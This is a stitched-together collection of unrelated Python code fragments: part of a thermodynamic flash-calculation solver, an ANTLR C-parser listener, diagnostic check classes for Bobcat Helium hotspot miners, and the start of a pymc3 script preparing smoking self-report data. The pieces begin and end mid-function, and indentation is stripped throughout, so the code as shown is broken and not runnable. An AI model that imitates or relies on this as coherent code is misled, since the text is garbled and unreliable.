xs_new = [abs(i)/xs_new_sum for i in xs_new]
break
for yi in ys_new:
if yi < 0.0:
ys_new_sum = sum(abs(i) for i in ys_new)
ys_new = [abs(i)/ys_new_sum for i in ys_new]
break
err = 0.0
# Suggested tolerance 1e-15
for Ki, xi, yi in zip(Ks, xs, ys):
# equivalent of fugacity ratio
# Could divide by the old Ks as well.
err_i = Ki*xi/yi - 1.0
err += err_i*err_i
# Accept the new compositions
xs, ys = xs_new, ys_new
# Check for a trivial solution (both phase compositions identical)
comp_difference = sum([abs(xi - yi) for xi, yi in zip(xs, ys)])
if comp_difference < trivial_solution_tol:
raise TrivialSolutionError("Converged to trivial condition, compositions of both phases equal",
comp_difference, iteration, err)
if err < tol:
return V_over_F, xs, ys, l, g, iteration, err
raise UnconvergedError('End of SS without convergence')
def nonlin_equilibrium_NP(T, P, zs, compositions_guesses, betas_guesses,
phases, maxiter=1000, tol=1E-13,
trivial_solution_tol=1e-5, ref_phase=-1,
method='hybr', solve_kwargs=None, debug=False):
if solve_kwargs is None:
solve_kwargs = {}
compositions = compositions_guesses
N = len(zs)
Nm1 = N - 1
cmps = range(N)
phase_count = len(phases)
phase_iter = range(phase_count)
if ref_phase < 0:
ref_phase = phase_count + ref_phase
phase_iter_n1 = [i for i in phase_iter if i != ref_phase]
phase_iter_n1_0 = range(phase_count-1)
betas = betas_guesses
if len(betas) < len(phases):
betas.append(1.0 - sum(betas))
flows_guess = [compositions_guesses[j][i]*betas[j] for j in phase_iter_n1 for | |
# Enter a parse tree produced by CParser#declarationSpecifier.
def enterDeclarationSpecifier(self, ctx:CParser.DeclarationSpecifierContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#declarationSpecifier.
def exitDeclarationSpecifier(self, ctx:CParser.DeclarationSpecifierContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#initDeclaratorList.
def enterInitDeclaratorList(self, ctx:CParser.InitDeclaratorListContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#initDeclaratorList.
def exitInitDeclaratorList(self, ctx:CParser.InitDeclaratorListContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#initDeclarator.
def enterInitDeclarator(self, ctx:CParser.InitDeclaratorContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#initDeclarator.
def exitInitDeclarator(self, ctx:CParser.InitDeclaratorContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#storageClassSpecifier.
def enterStorageClassSpecifier(self, ctx:CParser.StorageClassSpecifierContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#storageClassSpecifier.
def exitStorageClassSpecifier(self, ctx:CParser.StorageClassSpecifierContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#typeSpecifier.
def enterTypeSpecifier(self, ctx:CParser.TypeSpecifierContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#typeSpecifier.
def exitTypeSpecifier(self, ctx:CParser.TypeSpecifierContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#structOrUnionSpecifier.
def enterStructOrUnionSpecifier(self, ctx:CParser.StructOrUnionSpecifierContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#structOrUnionSpecifier.
def exitStructOrUnionSpecifier(self, ctx:CParser.StructOrUnionSpecifierContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#structOrUnion.
def enterStructOrUnion(self, ctx:CParser.StructOrUnionContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#structOrUnion.
def exitStructOrUnion(self, ctx:CParser.StructOrUnionContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#structDeclarationList.
def enterStructDeclarationList(self, ctx:CParser.StructDeclarationListContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#structDeclarationList.
def exitStructDeclarationList(self, ctx:CParser.StructDeclarationListContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#structDeclaration.
def enterStructDeclaration(self, ctx:CParser.StructDeclarationContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#structDeclaration.
def exitStructDeclaration(self, ctx:CParser.StructDeclarationContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#specifierQualifierList.
def enterSpecifierQualifierList(self, ctx:CParser.SpecifierQualifierListContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#specifierQualifierList.
def exitSpecifierQualifierList(self, ctx:CParser.SpecifierQualifierListContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#structDeclaratorList.
def enterStructDeclaratorList(self, ctx:CParser.StructDeclaratorListContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#structDeclaratorList.
def exitStructDeclaratorList(self, ctx:CParser.StructDeclaratorListContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#structDeclarator.
def enterStructDeclarator(self, ctx:CParser.StructDeclaratorContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#structDeclarator.
def exitStructDeclarator(self, ctx:CParser.StructDeclaratorContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#enumSpecifier.
def enterEnumSpecifier(self, ctx:CParser.EnumSpecifierContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#enumSpecifier.
def exitEnumSpecifier(self, ctx:CParser.EnumSpecifierContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#enumeratorList.
def enterEnumeratorList(self, ctx:CParser.EnumeratorListContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#enumeratorList.
def exitEnumeratorList(self, ctx:CParser.EnumeratorListContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#enumerator.
def enterEnumerator(self, ctx:CParser.EnumeratorContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#enumerator.
def exitEnumerator(self, ctx:CParser.EnumeratorContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#enumerationConstant.
def enterEnumerationConstant(self, ctx:CParser.EnumerationConstantContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#enumerationConstant.
def exitEnumerationConstant(self, ctx:CParser.EnumerationConstantContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#atomicTypeSpecifier.
def enterAtomicTypeSpecifier(self, ctx:CParser.AtomicTypeSpecifierContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#atomicTypeSpecifier.
def exitAtomicTypeSpecifier(self, ctx:CParser.AtomicTypeSpecifierContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#typeQualifier.
def enterTypeQualifier(self, ctx:CParser.TypeQualifierContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#typeQualifier.
def exitTypeQualifier(self, ctx:CParser.TypeQualifierContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#functionSpecifier.
def enterFunctionSpecifier(self, ctx:CParser.FunctionSpecifierContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#functionSpecifier.
def exitFunctionSpecifier(self, ctx:CParser.FunctionSpecifierContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#alignmentSpecifier.
def enterAlignmentSpecifier(self, ctx:CParser.AlignmentSpecifierContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#alignmentSpecifier.
def exitAlignmentSpecifier(self, ctx:CParser.AlignmentSpecifierContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#declarator.
def enterDeclarator(self, ctx:CParser.DeclaratorContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#declarator.
def exitDeclarator(self, ctx:CParser.DeclaratorContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#directDeclarator.
def enterDirectDeclarator(self, ctx:CParser.DirectDeclaratorContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#directDeclarator.
def exitDirectDeclarator(self, ctx:CParser.DirectDeclaratorContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#gccDeclaratorExtension.
def enterGccDeclaratorExtension(self, ctx:CParser.GccDeclaratorExtensionContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#gccDeclaratorExtension.
def exitGccDeclaratorExtension(self, ctx:CParser.GccDeclaratorExtensionContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#gccAttributeSpecifier.
def enterGccAttributeSpecifier(self, ctx:CParser.GccAttributeSpecifierContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#gccAttributeSpecifier.
def exitGccAttributeSpecifier(self, ctx:CParser.GccAttributeSpecifierContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#gccAttributeList.
def enterGccAttributeList(self, ctx:CParser.GccAttributeListContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#gccAttributeList.
def exitGccAttributeList(self, ctx:CParser.GccAttributeListContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#gccAttribute.
def enterGccAttribute(self, ctx:CParser.GccAttributeContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#gccAttribute.
def exitGccAttribute(self, ctx:CParser.GccAttributeContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#nestedParenthesesBlock.
def enterNestedParenthesesBlock(self, ctx:CParser.NestedParenthesesBlockContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#nestedParenthesesBlock.
def exitNestedParenthesesBlock(self, ctx:CParser.NestedParenthesesBlockContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#pointer.
def enterPointer(self, ctx:CParser.PointerContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#pointer.
def exitPointer(self, ctx:CParser.PointerContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#typeQualifierList.
def enterTypeQualifierList(self, ctx:CParser.TypeQualifierListContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#typeQualifierList.
def exitTypeQualifierList(self, ctx:CParser.TypeQualifierListContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#parameterTypeList.
def enterParameterTypeList(self, ctx:CParser.ParameterTypeListContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#parameterTypeList.
def exitParameterTypeList(self, ctx:CParser.ParameterTypeListContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#parameterList.
def enterParameterList(self, ctx:CParser.ParameterListContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#parameterList.
def exitParameterList(self, ctx:CParser.ParameterListContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#parameterDeclaration.
def enterParameterDeclaration(self, ctx:CParser.ParameterDeclarationContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#parameterDeclaration.
def exitParameterDeclaration(self, ctx:CParser.ParameterDeclarationContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#identifierList.
def enterIdentifierList(self, ctx:CParser.IdentifierListContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#identifierList.
def exitIdentifierList(self, ctx:CParser.IdentifierListContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#typeName.
def enterTypeName(self, ctx:CParser.TypeNameContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#typeName.
def exitTypeName(self, ctx:CParser.TypeNameContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#abstractDeclarator.
def enterAbstractDeclarator(self, ctx:CParser.AbstractDeclaratorContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#abstractDeclarator.
def exitAbstractDeclarator(self, ctx:CParser.AbstractDeclaratorContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#directAbstractDeclarator.
def enterDirectAbstractDeclarator(self, ctx:CParser.DirectAbstractDeclaratorContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#directAbstractDeclarator.
def exitDirectAbstractDeclarator(self, ctx:CParser.DirectAbstractDeclaratorContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#typedefName.
def enterTypedefName(self, ctx:CParser.TypedefNameContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#typedefName.
def exitTypedefName(self, ctx:CParser.TypedefNameContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#initializer.
def enterInitializer(self, ctx:CParser.InitializerContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#initializer.
def exitInitializer(self, ctx:CParser.InitializerContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#initializerList.
def enterInitializerList(self, ctx:CParser.InitializerListContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#initializerList.
def exitInitializerList(self, ctx:CParser.InitializerListContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#designation.
def enterDesignation(self, ctx:CParser.DesignationContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#designation.
def exitDesignation(self, ctx:CParser.DesignationContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#designatorList.
def enterDesignatorList(self, ctx:CParser.DesignatorListContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#designatorList.
def exitDesignatorList(self, ctx:CParser.DesignatorListContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#designator.
def enterDesignator(self, ctx:CParser.DesignatorContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#designator.
def exitDesignator(self, ctx:CParser.DesignatorContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#staticAssertDeclaration.
def enterStaticAssertDeclaration(self, ctx:CParser.StaticAssertDeclarationContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#staticAssertDeclaration.
def exitStaticAssertDeclaration(self, ctx:CParser.StaticAssertDeclarationContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#statement.
def enterStatement(self, ctx:CParser.StatementContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#statement.
def exitStatement(self, ctx:CParser.StatementContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#labeledStatement.
def enterLabeledStatement(self, ctx:CParser.LabeledStatementContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#labeledStatement.
def exitLabeledStatement(self, ctx:CParser.LabeledStatementContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#compoundStatement.
def enterCompoundStatement(self, ctx:CParser.CompoundStatementContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#compoundStatement.
def exitCompoundStatement(self, ctx:CParser.CompoundStatementContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#blockItemList.
def enterBlockItemList(self, ctx:CParser.BlockItemListContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#blockItemList.
def exitBlockItemList(self, ctx:CParser.BlockItemListContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#blockItem.
def enterBlockItem(self, ctx:CParser.BlockItemContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#blockItem.
def exitBlockItem(self, ctx:CParser.BlockItemContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#expressionStatement.
def enterExpressionStatement(self, ctx:CParser.ExpressionStatementContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#expressionStatement.
def exitExpressionStatement(self, ctx:CParser.ExpressionStatementContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#selectionStatement.
def enterSelectionStatement(self, ctx:CParser.SelectionStatementContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#selectionStatement.
def exitSelectionStatement(self, ctx:CParser.SelectionStatementContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#iterationStatement.
def enterIterationStatement(self, ctx:CParser.IterationStatementContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#iterationStatement.
def exitIterationStatement(self, ctx:CParser.IterationStatementContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#forCondition.
def enterForCondition(self, ctx:CParser.ForConditionContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#forCondition.
def exitForCondition(self, ctx:CParser.ForConditionContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#forDeclaration.
def enterForDeclaration(self, ctx:CParser.ForDeclarationContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#forDeclaration.
def exitForDeclaration(self, ctx:CParser.ForDeclarationContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#forExpression.
def enterForExpression(self, ctx:CParser.ForExpressionContext):
self.enter_rule(ctx)
The process can take some time so please be patient and cooperative.",
],
troubleshooting_guides=[
"https://bobcatminer.zendesk.com/hc/en-us/articles/4413692565659-Common-Error-Logs-in-Miner-5s-"
],
)
def check(self):
raise NotImplementedError
class TooManyLookupAttemptsErrorCheck(BobcatCheck):
def __init__(self, bobcat: Bobcat, verbose: str):
super().__init__(
bobcat=bobcat,
verbose=verbose,
name="Too Many Lookup Attempts Error",
root_cause="DNS server settings",
description="This error occurs when your DNS server cannot find the correct nameserver. Normally, the Bobcat miner will automatically add the appropriate nameserver for you.",
autopilot_repair_steps=[],
manual_repair_steps=[
"If this error continues to appear and your miner is not behaving as expected you can try setting your DNS server to 8.8.8.8.",
],
customer_support_steps=[
"If possible, send screenshots of your Diagnoser.",
"Tell us what color your LED is.",
"If you can't access your Diagnoser, please open port 22",
"Provide the miner's public IP address.",
"Confirm Port 22 is Open (Include a Screenshot of this Page)",
],
troubleshooting_guides=[
"https://bobcatminer.zendesk.com/hc/en-us/articles/4413692565659-Common-Error-Logs-in-Miner-5s-"
],
)
def check(self):
raise NotImplementedError
class OnboardingDewiOrgNxdomainErrorCheck(BobcatCheck):
def __init__(self, bobcat: Bobcat, verbose: str):
super().__init__(
bobcat=bobcat,
verbose=verbose,
name="Onboarding Dewi Org Nxdomain Error",
root_cause="DNS server settings",
description="This error occurs when your DNS server cannot find the correct nameserver. Normally, the Bobcat will automatically add the appropriate nameserver for you. ",
autopilot_repair_steps=[],
manual_repair_steps=[
"If this error continues to appear and your miner is not behaving as expected you can try setting your DNS server to 8.8.8.8.",
],
customer_support_steps=[
"If possible, send screenshots of your Diagnoser.",
"Tell us what color your LED is.",
"If you can't access your Diagnoser, please open port 22",
"Provide the miner's public IP address.",
"Confirm Port 22 is Open (Include a Screenshot of this Page)",
],
troubleshooting_guides=[
"https://bobcatminer.zendesk.com/hc/en-us/articles/4413692565659-Common-Error-Logs-in-Miner-5s-"
],
)
def check(self):
raise NotImplementedError
class FailedToStartChildErrorCheck(BobcatCheck):
def __init__(self, bobcat: Bobcat, verbose: str):
super().__init__(
bobcat=bobcat,
verbose=verbose,
name="Failed To Start Child Error",
root_cause="Faulty ECC chip",
description="This usually means that there is either a ECC chip fault or it's a firmware issue.",
autopilot_repair_steps=[
{"func": bobcat.reset},
{"func": bobcat.fastsync},
],
manual_repair_steps=[
"Reset",
"Fastsync",
],
customer_support_steps=[
"If possible, send screenshots of your Diagnoser.",
"Tell us what color your LED is.",
"If you can't access your Diagnoser, please open port 22",
"Provide the miner's public IP address.",
"Confirm Port 22 is Open (Include a Screenshot of this Page)",
],
troubleshooting_guides=[
"https://bobcatminer.zendesk.com/hc/en-us/articles/4413692565659-Common-Error-Logs-in-Miner-5s-"
],
)
def check(self):
raise NotImplementedError
class NotADetsFileErrorCheck(BobcatCheck):
def __init__(self, bobcat: Bobcat, verbose: str):
super().__init__(
bobcat=bobcat,
verbose=verbose,
name="Not A Dets File Error",
root_cause="Broken Blockchain but this shouldn't be an issue anymore with the latest firmware.",
description="There is probably a corruption in the database",
autopilot_repair_steps=[
{"func": bobcat.resync},  # assumes Bobcat.resync exists, mirroring the "Resync" manual step below
{"func": bobcat.fastsync},
],
manual_repair_steps=[
"Resync",
"Fastsync",
],
customer_support_steps=[
"If possible, send screenshots of your Diagnoser.",
"Tell us what color your LED is.",
"If you can't access your Diagnoser, please open port 22",
"Provide the miner's public IP address.",
"Confirm Port 22 is Open (Include a Screenshot of this Page)",
],
troubleshooting_guides=[
"https://bobcatminer.zendesk.com/hc/en-us/articles/4413692565659-Common-Error-Logs-in-Miner-5s-"
],
)
def check(self):
raise NotImplementedError
class SnapshotsHeliumWTFErrorCheck(BobcatCheck):
def __init__(self, bobcat: Bobcat, verbose: str):
super().__init__(
bobcat=bobcat,
verbose=verbose,
name="Snapshots Helium WTF Error",
root_cause="DNS issue",
description="Miner is unable to connect to DNS servers. New Diagnoser should automatically add Google DNS so it should get rid of this issue.",
autopilot_repair_steps=[],
manual_repair_steps=[
"Add 8.8.8.8 to your DNS server",
],
customer_support_steps=[
"If possible, send screenshots of your Diagnoser.",
"Tell us what color your LED is.",
"If you can't access your Diagnoser please open port 22",
"Provide the miner's public IP address.",
"Confirm Port 22 is Open (Include a Screenshot of this Page)",
"Double check with your ISP to see if there is a strict firewall.",
],
troubleshooting_guides=[
"https://bobcatminer.zendesk.com/hc/en-us/articles/4413692565659-Common-Error-Logs-in-Miner-5s-"
],
)
def check(self):
raise NotImplementedError
class SnapshotDownloadOrLoadingFailedErrorCheck(BobcatCheck):
def __init__(self, bobcat: Bobcat, verbose: str):
super().__init__(
bobcat=bobcat,
verbose=verbose,
name="Snapshot Download or Loading Failed Error",
root_cause="Miner is unable to download the latest snapshot from the blockchain",
description="There may be too many miners trying to download the snapshot at the same time or your internet connection may be too slow.",
autopilot_repair_steps=[],
manual_repair_steps=[
"Check that your miner is connected via ethernet and that your internet connection is stable, otherwise, the situation should eventually sort itself out.",
],
customer_support_steps=[
"If possible, send screenshots of your Diagnoser.",
"Tell us what color your LED is.",
"If you can't access your Diagnoser, please open port 22",
"Provide the miner's public IP address.",
"Confirm Port 22 is Open (Include a Screenshot of this Page)",
],
troubleshooting_guides=[
"https://bobcatminer.zendesk.com/hc/en-us/articles/4413692565659-Common-Error-Logs-in-Miner-5s-"
],
)
def check(self):
raise NotImplementedError
class NoPlausibleBlocksInBatchErrorCheck(BobcatCheck):
def __init__(self, bobcat: Bobcat, verbose: str):
super().__init__(
bobcat=bobcat,
verbose=verbose,
name="No Plausible Blocks In Batch Error",
root_cause="Helium Network Bug error",
description="This is a Helium network bug that affects miners across all manufacturers. Helium is actively trying to solve the issue.",
autopilot_repair_steps=[
{"func": bobcat.reset},
{"func": bobcat.fastsync},
],
manual_repair_steps=[
"Helium recommends that you continue to resync and reset until your miner is able to get past the snapshot. Unfortunately, if that doesn't work then you will have to wait for Helium OTA update to fix the issue."
],
customer_support_steps=[
"If possible, send screenshots of your Diagnoser.",
"Tell us what color your LED is.",
"If you can't access your Diagnoser, please open port 22",
"Provide the miner's public IP address.",
"Confirm Port 22 is Open (Include a Screenshot of this Page)",
],
troubleshooting_guides=[
"https://bobcatminer.zendesk.com/hc/en-us/articles/4413692565659-Common-Error-Logs-in-Miner-5s-"
],
)
def check(self):
raise NotImplementedError
class RPCFailedCheck(BobcatCheck):
def __init__(self, bobcat: Bobcat, verbose: str):
super().__init__(
bobcat=bobcat,
verbose=verbose,
name="RPC to 'miner@127.0.0.1' failed Error",
root_cause="Docker container or ECC fault",
description="You might see this during a reset, reboot, or OTA. This is related to the status of the ECC chip. If this error goes away then nothing is wrong. If you continue to see the error you can try the following.",
autopilot_repair_steps=[
{"func": bobcat.reboot},
{"func": bobcat.reset},
{"func": bobcat.fastsync},
],
manual_repair_steps=[
"First Try Reboot",
"Then Try Reset",
"Then Fastsync",
"Make Sure Your Miner is Connected to the Internet. What color is the miner's LED?",
],
customer_support_steps=[
"If possible, send screenshots of your Diagnoser.",
"Tell us what color your LED is.",
"If you can't access your Diagnoser, please open port 22",
"Provide the miner's public IP address.",
"Confirm Port 22 is Open (Include a Screenshot of this Page)",
],
troubleshooting_guides=[
"https://bobcatminer.zendesk.com/hc/en-us/articles/4413692565659-Common-Error-Logs-in-Miner-5s-"
],
)
def check(self):
raise NotImplementedError
class UnknownErrorCheck(BobcatCheck):
def __init__(self, bobcat: Bobcat, verbose: str):
super().__init__(
bobcat=bobcat,
verbose=verbose,
name="Unknown Error Status",
root_cause="Miner's Docker Container",
description="This can happen if your miner's Docker crashes. Sometimes losing power or internet connection during an OTA can cause a miner's Docker to crash. This can typically be fixed with a reboot or a reset, followed by a fast sync if your gap is >400. Fast Sync is recommended if your gap is >400 and your miner has been fully synced before.",
autopilot_repair_steps=[
{"func": bobcat.reboot},
{"func": bobcat.reset},
{"func": bobcat.fastsync},
],
manual_repair_steps=[
"First Try Reboot",
"Try Reset",
"Then Fastsync",
"Make Sure Your Miner is Connected to the Internet. What color is your miner's LED?",
],
customer_support_steps=[
"If Possible, Screenshots of Your Diagnoser.",
"Indicate Miner's LED Color",
"Open Port 22, if Unable to Access the Diagnoser",
"Provide Miner's IP Address",
"Confirm Port 22 is Open (Include a Screenshot of this Page)",
],
troubleshooting_guides=[
"https://bobcatminer.zendesk.com/hc/en-us/articles/4413666097051-Status-Down-4413666097051-Status-Down-"
],
)
def check(self) -> bool:
is_unhealthy = not self.bobcat.is_healthy
if is_unhealthy:
self.bobcat.logger.error(
f"Bobcat Status: {self.bobcat.status.capitalize()}",
extra={"description": str(self)} if self.verbose else {},
)
return is_unhealthy
class OnlineStatusCheck(BobcatCheck):
def __init__(self, bobcat: Bobcat, verbose: str):
super().__init__(
bobcat=bobcat,
verbose=verbose,
name="Online Status",
root_cause="The Helium Network sees your Bobcat as Offline.",
description="This shows the hotspot information that is currently available in the Helium blockchain. Note that this might differ from the actual status of your hotspot as it takes time for information to propagate from your hotspot to the blockchain.",
autopilot_repair_steps=[],
manual_repair_steps=[
"Check the Diagnoser to see if the Bobcat is running and is healthy.",
"Give the Helium Network more time to propagate from your hotspot to the blockchain. Wait 24 hours and check again.",
],
customer_support_steps=[
"If possible, send screenshots of your Diagnoser.",
"Tell us what color your LED is.",
"If you can't access your Diagnoser, please open port 22",
"Provide the miner's public IP address.",
"Confirm Port 22 is Open (Include a Screenshot of this Page)",
],
troubleshooting_guides=["https://www.nowitness.org/troubleshooting/"],
| |
#%%
import pymc3 as pm
import arviz as az
import pandas as pd
import numpy as np
from datetime import datetime
from scipy import stats
import os
import pickle
import theano.tensor as tt
from scipy import special
# List down file paths
#dir_data = "../smoking-lvm-cleaned-data/final"
dir_data = os.environ['dir_data']
dir_picklejar = os.environ['dir_picklejar']
# Read in data
data_dates = pd.read_csv(os.path.join(os.path.realpath(dir_data), 'participant-dates.csv'))
data_selfreport = pd.read_csv(os.path.join(os.path.realpath(dir_data), 'self-report-smoking-final.csv'))
#%%
###############################################################################
# Data preparation: data_dates data frame
###############################################################################
# Create unix timestamps corresponding to 12AM of a given human-readable date
for col in ["start_date", "quit_date", "expected_end_date", "actual_end_date"]:
    data_dates[col + "_unixts"] = (
        data_dates[col]
        .apply(lambda x: datetime.strptime(x, "%m/%d/%Y"))
        .apply(lambda x: datetime.timestamp(x))
    )
# More tidying up
data_dates = (
data_dates
.rename(columns={"participant": "participant_id",
"quit_date": "quit_date_hrts",
"start_date": "start_date_hrts",
"actual_end_date": "actual_end_date_hrts",
"expected_end_date": "expected_end_date_hrts"})
.loc[:, ["participant_id",
"start_date_hrts","quit_date_hrts",
"expected_end_date_hrts", "actual_end_date_hrts",
"start_date_unixts", "quit_date_unixts",
"expected_end_date_unixts","actual_end_date_unixts"]]
)
#%%
###############################################################################
# Merge data_selfreport with data_dates
###############################################################################
data_selfreport = data_dates.merge(data_selfreport,
how = 'left',
on = 'participant_id')
#%%
###############################################################################
# Data preparation: data_selfreport data frame
###############################################################################
# Drop rows with a missing 'hour' value
data_selfreport = data_selfreport.dropna(how = 'any', subset=['hour'])
def calculate_delta(message):
sr_accptresponse = ['Smoking Event(less than 5 minutes ago)',
'Smoking Event(5 - 15 minutes ago)',
'Smoking Event(15 - 30 minutes ago)',
'Smoking Event(more than 30 minutes ago)']
sr_dictionary = {'Smoking Event(less than 5 minutes ago)': 1,
'Smoking Event(5 - 15 minutes ago)': 2,
'Smoking Event(15 - 30 minutes ago)': 3,
'Smoking Event(more than 30 minutes ago)': 4}
if message in sr_accptresponse:
# Map the reported recall window onto an integer tag (1-4)
use_delta = sr_dictionary[message]
else:
# Any other response does not pin down when smoking occurred,
# so treat the smoking time as missing
use_delta = pd.NA
return use_delta
def round_day(raw_day):
if pd.isna(raw_day):
# Missing values for raw_day can occur
# if participant reported smoking more than 30 minutes ago
out_day = pd.NA
else:
# This takes care of the instances when participant reported to smoke
# less than 30 minutes ago
if raw_day >= 0:
# If on or after Quit Date, round down to the nearest integer
# e.g., floor(2.7)=2
out_day = np.floor(raw_day)
else:
# If before Quit Date, round up to the nearest integer
# e.g., ceil(-2.7)=-2
out_day = np.ceil(raw_day)
return out_day
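A quick numeric check of the rounding convention used in round_day (this sketch only exercises the numpy calls; both branches round toward the Quit Date, i.e., toward zero):

```python
import numpy as np

# On/after the Quit Date (raw_day >= 0): round down, floor(2.7) = 2.0
assert np.floor(2.7) == 2.0
# Before the Quit Date (raw_day < 0): round up, ceil(-2.7) = -2.0
assert np.ceil(-2.7) == -2.0
# In both cases the fractional part of the day is truncated toward zero
assert np.trunc(2.7) == np.floor(2.7) and np.trunc(-2.7) == np.ceil(-2.7)
```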
#%%
data_selfreport['date'] = pd.to_datetime(data_selfreport.date)
data_selfreport['start_date'] = pd.to_datetime(data_selfreport.start_date_hrts)
data_selfreport['quit_date'] = pd.to_datetime(data_selfreport.quit_date_hrts)
data_selfreport["delta"] = data_selfreport["message"].apply(lambda x: calculate_delta(x))
# Create a new variable, study_day: number of days since participant entered
# the study
data_selfreport['study_day'] = (data_selfreport['date'] - data_selfreport['start_date']).dt.days
# Create a new variable, day_since_quit: number of days before or after
# 12AM on Quit Date
data_selfreport['day_since_quit'] = (data_selfreport['date'] - data_selfreport['quit_date']).dt.days
# Create a new variable, is_post_quit: whether a given day falls before or on/after 12AM on Quit Date
